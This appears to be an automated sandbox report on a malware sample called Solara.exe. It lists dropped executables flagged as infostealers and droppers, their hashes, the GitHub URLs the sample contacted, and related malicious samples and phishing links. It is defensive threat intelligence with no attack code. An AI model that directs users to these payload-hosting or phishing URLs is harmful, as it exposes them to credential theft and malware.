C:\Users\user\AppData\Local\Temp\kx new.exe | 100% | Joe Sandbox ML |
C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe | 68% | ReversingLabs | Win64.Infostealer.Tinba
C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe | 74% | ReversingLabs | Win64.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\Kawpow new.exe | 74% | ReversingLabs | Win64.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | 68% | ReversingLabs | Win32.Dropper.Dapato
C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | 33% | ReversingLabs | Win32.PUA.Packunwan
C:\Users\user\AppData\Local\Temp\eth.exe | 68% | ReversingLabs | Win64.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\kx new.exe | 71% | ReversingLabs | Win32.Dropper.Dapato
C:\Users\user\AppData\Local\Temp\xmr new.exe | 74% | ReversingLabs | Win64.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\xmr.exe | 76% | ReversingLabs | Win64.Infostealer.Tinba
No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
github.com | 140.82.121.4 | true | false | | high
raw.githubusercontent.com | 185.199.108.133 | true | false | | high
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 217.20.57.35 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zip | false | | high
https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txt | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
185.199.108.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
140.82.121.4 | github.com | United States | 36459 | GITHUBUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1585410
Start date and time: 2025-01-07 16:04:20 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 83
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Solara.exe
Detection: MAL
Classification: mal100.evad.winEXE@146/40@2/2
EGA Information:
• Successful, ratio: 73.3%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 249
• Number of non-executed functions: 210
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 20.109.210.53, 52.165.164.15, 13.85.23.206, 2.22.50.131, 2.22.50.144, 13.107.246.45, 23.1.237.91
• Excluded domains from analysis (whitelisted): www.bing.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Execution Graph export aborted for target SolaraBootstrapper.exe, PID 1292 because it is empty
• Execution Graph export aborted for target eth.exe, PID 6392 because it is empty
• Execution Graph export aborted for target lrgkmixyjzta.exe, PID 7828 because it is empty
• Execution Graph export aborted for target xmr.exe, PID 6024 because it is empty
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Solara.exe
Time | Type | Description
10:05:09 | API Interceptor | 1x Sleep call for process: xmr.exe modified
10:05:09 | API Interceptor | 1x Sleep call for process: eth.exe modified
10:05:09 | API Interceptor | 216x Sleep call for process: powershell.exe modified
10:05:17 | API Interceptor | 1x Sleep call for process: Kawpow new.exe modified
10:05:17 | API Interceptor | 13x Sleep call for process: SolaraBootstrapper.exe modified
10:05:18 | API Interceptor | 1x Sleep call for process: xmr new.exe modified
10:05:59 | API Interceptor | 400472x Sleep call for process: winlogon.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.199.108.133 | cr_asm.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.108.133 | vF20HtY4a4.exe | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.108.133 | VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.108.133 | OSLdZanXNc.exe | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.108.133 | gaber.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.108.133 | cr_asm.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
140.82.121.4 | RfORrHIRNe.doc | malicious | Unknown | github.com/ssbb36/stv/raw/main/5.mp3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
github.com | https://github.com/eclipse-ecal/ecal/releases/download/v5.13.3/ecal_5.13.3-win64.exe | malicious | Unknown | 140.82.121.3
github.com | PO#6100008 Jan04.02.2024.Xls.js | malicious | WSHRat, STRRAT | 140.82.121.4
github.com | ebjtOH70jl.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar | 140.82.121.3
github.com | Gz1bBIg2Tw.exe | malicious | LummaC | 140.82.121.4
github.com | ipmsg5.6.18_installer.exe | malicious | Unknown | 140.82.121.3
github.com | eXbhgU9.exe | malicious | LummaC | 140.82.121.4
github.com | fxsound_setup.exe | malicious | Unknown | 20.233.83.145
github.com | Electrum-bch-4.4.2-x86_64.AppImage.elf | malicious | Unknown | 185.199.111.133
github.com | OiMp3TH.exe | malicious | LummaC | 20.233.83.145
github.com | YYjRtxS70h.exe | malicious | Unknown | 20.233.83.145
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | Sales Acknowledgement - HES #982323.pdf | malicious | Unknown | 84.201.210.39
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zip | malicious | Unknown | 217.20.57.36
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | Setup.exe | malicious | LummaC | 217.20.57.18
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | Insomia.exe | malicious | LummaC | 84.201.210.35
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | T1#U5b89#U88c5#U53052.0.6.msi | malicious | Unknown | 84.201.210.34
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | dGhlYXB0Z3JvdXA=-free.exe | malicious | Unknown | 84.201.210.22
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | Dd5DwDCHJD.exe | malicious | Quasar | 217.20.57.35
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 46VHQmFDxC.exe | malicious | RedLine | 217.20.57.43
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | Payment-Order #24560274 for 8,380 USD.exe | malicious | AsyncRAT, PureLog Stealer, zgRAT | 217.20.57.35
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | PersonnelPolicies.pdf | malicious | KnowBe4, PDFPhish | 217.20.57.37
raw.githubusercontent.com | 3lhrJ4X.exe | malicious | LiteHTTP Bot | 185.199.111.133
raw.githubusercontent.com | dGhlYXB0Z3JvdXA=-free.exe | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | dGhlYXB0Z3JvdXA=-free.exe | malicious | Unknown | 185.199.110.133
raw.githubusercontent.com | Gz1bBIg2Tw.exe | malicious | LummaC | 185.199.109.133
raw.githubusercontent.com | ipmsg5.6.18_installer.exe | malicious | Unknown | 185.199.111.133
raw.githubusercontent.com | over.ps1 | malicious | Vidar | 185.199.109.133
raw.githubusercontent.com | Epsilon.exe | malicious | Unknown | 185.199.111.133
raw.githubusercontent.com | eXbhgU9.exe | malicious | LummaC | 185.199.110.133
raw.githubusercontent.com | Purchase Order Summary Details.vbs | malicious | LodaRAT, XRed | 185.199.108.133
raw.githubusercontent.com | Purchase Order Summary Details.vbs | malicious | LodaRAT, XRed | 185.199.108.133
Match | Associated Sample Name / URL | Detection | Threat Name | Context
GITHUBUS | https://github.com/eclipse-ecal/ecal/releases/download/v5.13.3/ecal_5.13.3-win64.exe | malicious | Unknown | 140.82.121.3
GITHUBUS | PO#6100008 Jan04.02.2024.Xls.js | malicious | WSHRat, STRRAT | 140.82.121.4
GITHUBUS | ebjtOH70jl.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar | 140.82.121.3
GITHUBUS | Gz1bBIg2Tw.exe | malicious | LummaC | 140.82.121.4
GITHUBUS | ipmsg5.6.18_installer.exe | malicious | Unknown | 140.82.121.3
GITHUBUS | EdYEXasNiR.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | 140.82.121.3
GITHUBUS | 5EfYBe3nch.exe | malicious | LummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, Stealc | 140.82.121.3
GITHUBUS | eXbhgU9.exe | malicious | LummaC | 140.82.121.4
GITHUBUS | rQuotation.exe | malicious | FormBook | 192.30.252.154
GITHUBUS | https://pdf.ac/3eQ2md | malicious | HTMLPhisher, Tycoon2FA | 140.82.112.3
FASTLYUS | Airbornemx_PAYOUT7370.odt | malicious | Unknown | 151.101.2.137
FASTLYUS | https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526 | malicious | Unknown | 151.101.128.176
FASTLYUS | https://email.garagesalefinder.com/c/eJyMU92OsjoUfZp6xwRaoO2FF-XPYT4VnXHQ8caUFivK3wcC-vYnzImc25OQlbXYa-_VJrtyniCCZ-ncwMg2KKWmPrvMCRWYGDSBBAkLnSGigttEUJpiLHRhzLK5JRHWEbE0wS1LkxzqmpnKRCMYcymIhUyJgKkr3nCVtjxPz1kp0-ZNVMUsn1_u9xogBmAAYDAMw5uqKpWnXLZp02cibUcfgEHNVcolgAEX-Q2goOUAeUsAbZ4B5Lma-bXS9YjEH8_jUsCMDFHdh-8V6xawX6ug4FFt3FtnCCFin8wJow2-DWulyU1_iVhfsfe8SpYtI8px_iiPHZXv8Movh2Cj-95Hcj0kV7urV6jyYvatjOfWaYZ2MRxIba6V3Jx55O3PcZmp2muai3lerzYyDgu0zWKnNlb-o7Sf7h6p70NxCvM23_41HfOEGuWGy9q9Hnlqfep7pO0Kfgrvm-rvV7zTOloie11_fJdEol2uDrr9xfmOPrr1Vr-IJWM_mXjnt9SPV5IVx53pOD-UrUI1qHwX-N2-JfHP9ThUm97B9z_nIOnjcuOGjloo51Iwxy6FckMA7bIrAPIMAG2RSYA8a5H18gTbKy737aLto4f-0GD3DaDdZgogj0WebZ6M8IN8ys_TY2eziPTBe70KjWKtt8gaxll5lpZ3gDzBtbpLNBsalBgGNrFuUoTHOC67JgfIGzehnVYBQAtjAC37l8GRuSOYU4G-pG2NgEYgk_ReFjwWsPli0J_MwSSdVxuc_v2bYU25I0BvMvvT0fBL_tdrsyktMAglv0Qs4o5D0vHD8ZIUFG4XwVMUFP0UQcef1jWBOkDea447drMR_PHuZATmTlIH0KIMQPP3-3_uWTOv0_JWvWU9L6semDpvmmpIeHn7fYv9HP4TAAD__7e2IkM | malicious | HTMLPhisher | 151.101.2.137
FASTLYUS | Onedrive Shared document.html | malicious | HTMLPhisher | 151.101.2.137
FASTLYUS | Quarantined Messages(3).zip | malicious | HTMLPhisher | 151.101.194.137
FASTLYUS | Sales Acknowledgement - HES #982323.pdf | malicious | Unknown | 151.101.129.140
FASTLYUS | https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000 | malicious | Unknown | 151.101.194.137
FASTLYUS | file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zip | malicious | Unknown | 199.232.214.172
FASTLYUS | Mansourbank Swift-TT379733 Report.svg | malicious | Branchlock Obfuscator | 151.101.193.229
FASTLYUS | https://e.trustifi.com/#/fff2a0/615048/6b9108/bb6bb8/0c4d40/10c266/f490c9/97ed1b/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/85de28/9434d8/86c8f5/bcad02/214fc7/998ea3/f74550/f15e41/328dbb/f2d014/49d879/3689f7/91b4f6/9617cd/897401/851960/993266/280340/ae6054/337b49/6f0428/673840/abdb07/82b8be/00f4e1/3270c4/922952/b4db4e/e9dcee/3a01c5/962a76/930521/2e7fc6/514759/a95ca8/c37226/be9e63/3c4ec2/89148e/13fdfe/ea86c0/04048b/56ab74/dca15f/97696c/fa7912/512e28/fc9f59/50d13f/4f0114/039a8f/84bd72/2603b6/e0eceb/28f211/4fdb34/a1dc16/2076ef/8e55cf/8f9d2c/0d4402/f5a713/43ec64/fabda1/b6994c/da2da1/2851a8/b04ed3/8cea9a/1e21dc/0abaf5/7df73e/f39a96/1f2244/423c00/5c4e8d | malicious | HTMLPhisher | 151.101.66.137
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | vRecording__0023secs__Stgusa.html | malicious | Unknown | 185.199.108.133, 140.82.121.4
3b5074b1b5d032e5620f69f9f700ff0e | ENQ-0092025.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 185.199.108.133, 140.82.121.4
3b5074b1b5d032e5620f69f9f700ff0e | U1P3u1tkB2.exe | malicious | Unknown | 185.199.108.133, 140.82.121.4
3b5074b1b5d032e5620f69f9f700ff0e | U1P3u1tkB2.exe | malicious | Unknown | 185.199.108.133, 140.82.121.4
3b5074b1b5d032e5620f69f9f700ff0e | 9876567899.bat.exe | malicious | Lokibot | 185.199.108.133, 140.82.121.4
3b5074b1b5d032e5620f69f9f700ff0e | https://antiphishing.vadesecure.com/v4?f=bnJjU3hQT3pQSmNQZVE3aOMl-Yxz6sxP-_mvIRuY-wdnZ1bXTFIOIwMxyCDi0KedKx4XzS44_P2zUeNIsKUb0ScW6k1yl1_sQ4IsBBcClSw_vWV34HFG0fKKBNYTYHpo&i=SGI0YVJGNmxZNE90Z2thMHUqf298Dc88cJEXrW3w1lA&k=dFBm&r=SW5LV3JodE9QZkRVZ3JEYa6kbR5XAzhHFJ0zbTQRADrRG7ugnfE15pwrEQUVhgv3E2tVXwBw8NfFSkf3wOZ0VA&s=ecaab139c1f3315ccc0d88a6451dccec431e8ce1d856e71e5109e33657c13a3c&u=https%3A%2F%2Fsender5.zohoinsights-crm.com%2Fck1%2F2d6f.327230a%2F5f929700-cca4-11ef-973d-525400f92481%2F4cb2ae4047e7a38310b2b2641663917c123a5dec%2F2%3Fe%3DGKxHQ%252FSSm8D%252B%252B3g8VEcICaLHKdekhRU94ImygZ37tRI%253D | malicious | Unknown | 185.199.108.133, 140.82.121.4
3b5074b1b5d032e5620f69f9f700ff0e | Mes_Drivers_3.0.4.exe | malicious | Unknown | 185.199.108.133, 140.82.121.4
3b5074b1b5d032e5620f69f9f700ff0e | c2.hta | malicious | Remcos | 185.199.108.133, 140.82.121.4
3b5074b1b5d032e5620f69f9f700ff0e | setup-avast-premium-x64.exe | malicious | Unknown | 185.199.108.133, 140.82.121.4
3b5074b1b5d032e5620f69f9f700ff0e | setup-avast-premium-x64.exe | malicious | Unknown | 185.199.108.133, 140.82.121.4
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Neverlose.exe | malicious | XWorm
C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Vjy8d2EoqK.exe | malicious | Blank Grabber, DCRat, XWorm
C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | RdJ73GU3N1.exe | malicious | Njrat
C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | SolaraBootstrapper.exe | malicious | DCRat, XWorm
C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | QIjBj1l8We.exe | malicious | Blank Grabber
C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | 6tGWMkdYv4.exe | malicious | Blank Grabber

Process: C:\Users\user\AppData\Local\Temp\xmr.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 5468672
Entropy (8bit): 6.523912582824609
Encrypted: false
SSDEEP: 98304:CKloGqNsn3EQMZrDn2aOzO5wzv80/rvVioLICFIJV6MGG/ZclhOP9fjSmlNi/LbP:Rloly39MBD2BiwPDV/IkIJV6AZcL49fy
MD5: 87C3DD67BFA3009D89F7B45B01D705B8
SHA1: 7EB74405565DD5971298B2A2C8DE9116D08DB2D5
SHA-256: 92722D28951672263B79CD30EB975D770CFD5BD5FF53344FD329546FB950F155
SHA-512: C79F10712BB505D3645C9FDF8EF11BD787AB327FC2F176302DE71B5D4A886026E46E40338A5DB964E4B42BD152F3279FDA8F2F842F99876BEE1B0783D2F74E0E
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 68%

Process: C:\Users\user\AppData\Local\Temp\xmr new.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 5471744
Entropy (8bit): 6.525931537093555
Encrypted: false
SSDEEP: 98304:gBybWc2fgjrlVrH3Y27fd2BY1z7QDkR3m1W:hic2GrrrH3Y2Bd1fIkR3m
MD5: FB6A3B436E9F9402937D95F755B62F91
SHA1: AEA3A8A311C2B8B6FC7D9D263B952F95A30B180E
SHA-256: 4C9D878E35E7FD497C633A770D3359FB37447985450DC19F45DB0925972C39E0
SHA-512: 7A3E2E42FE965DB1CEBC539235FEC88E277669C9A62BE2450EA4EFAF5DD93F1DE11740197FF26E697E9E9ACC499CBA2C30B64CFA5E5B35B28B9E0B93087EE2F8
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 74%

Process: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 954
Entropy (8bit): 5.350970057955659
Encrypted: false
SSDEEP: 24:ML9E4KLE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKLHKnYHKh3oPtHo6hAHKzeR
MD5: 3CE64235B0821B76294C3AD95F117E6C
SHA1: FD1EC471493CE132D0D719A9771739912BEF91BF
SHA-256: C5348C9009777CDF6C5CBD5D767A400932C0E1FA95F49DF8E797685754790850
SHA-512: DA80BE8655187998EB5425EC801E352C386891991A4575811DE365DFD38B1325DE95A540953EC6E9305E74B1A0560968729D742A01198540CFCC166635F104C5
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.IO.Compression.FileSystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 64
Entropy (8bit): 1.1510207563435464
Encrypted: false
SSDEEP: 3:NlllulJ:NllU
MD5: 0FF7A8A821E17ECC359CC9F60FD6515B
SHA1: ADE9BA72D5154FE4C7F1666CD4F3F0EB137A9272
SHA-256: C9569A33D275A4DFB4DAC45D2434A357DF072A27AD23498F83B24127E2F761C0
SHA-512: 9AF90D4E705EE4D70E1EA08BC3AB01A5061C749FED2D271E3C3F5F0775FAB7789DAAE720CA39D19AFCBB965C7DE900EAF5787A0C0CE8647FC7C775D7F8C3ADF9
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\kx new.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 5471744
Entropy (8bit): 6.525931537093555
Encrypted: false
SSDEEP: 98304:gBybWc2fgjrlVrH3Y27fd2BY1z7QDkR3m1W:hic2GrrrH3Y2Bd1fIkR3m
MD5: FB6A3B436E9F9402937D95F755B62F91
SHA1: AEA3A8A311C2B8B6FC7D9D263B952F95A30B180E
SHA-256: 4C9D878E35E7FD497C633A770D3359FB37447985450DC19F45DB0925972C39E0
SHA-512: 7A3E2E42FE965DB1CEBC539235FEC88E277669C9A62BE2450EA4EFAF5DD93F1DE11740197FF26E697E9E9ACC499CBA2C30B64CFA5E5B35B28B9E0B93087EE2F8
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 74%

Process: C:\Users\user\Desktop\Solara.exe
File Type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 10967040
Entropy (8bit): 7.001181834719954
Encrypted: false
SSDEEP: 196608:NaAEXnVB2t0vW54zu9cQ+6SLwC9tpg9FHh2C32cIPTv3O:NajFECvW5R9ccSLfYHhhbMv3
MD5: 00A1864355A5EA47902E5757C0D87FD9
SHA1: 4BE5647308E0925FB00FAE068CB4A89A8A449AFC
SHA-256: 4289002FD7528974AE7A9BF4D855BFD3812D248A46DBD7F94E7336F260AE7A39
SHA-512: 7F86E42676CFD77AAFD7A030656AD88D041BA54EDC6EAB41193528B03E79850F89E7D79679E6A14FFF8E69D7011E36E03D09C73A46E8FC722DC126C3DA4BE718
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 68%

Process: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe
File Type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 13312
Entropy (8bit): 4.677524556734161
Encrypted: false
SSDEEP: 192:konexQO0FoAWyEfJkVIaqaLHmr/XKT0ifnTJ1jvVXctNjA:HnexHAWyEfJoIaqayzKAifd1LVEj
MD5: 6557BD5240397F026E675AFB78544A26
SHA1: 839E683BF68703D373B6EAC246F19386BB181713
SHA-256: A7FECFC225DFDD4E14DCD4D1B4BA1B9F8E4D1984F1CDD8CDA3A9987E5D53C239
SHA-512: F2399D34898A4C0C201372D2DD084EE66A66A1C3EAE949E568421FE7EDADA697468EF81F4FCAB2AFD61EAF97BCB98D6ADE2D97295E2F674E93116D142E892E97
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 33%
Joe Sandbox View:
• Filename: Neverlose.exe, Detection: malicious
• Filename: Vjy8d2EoqK.exe, Detection: malicious
• Filename: RdJ73GU3N1.exe, Detection: malicious
• Filename: SolaraBootstrapper.exe, Detection: malicious
• Filename: QIjBj1l8We.exe, Detection: malicious
• Filename: 6tGWMkdYv4.exe, Detection: malicious

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
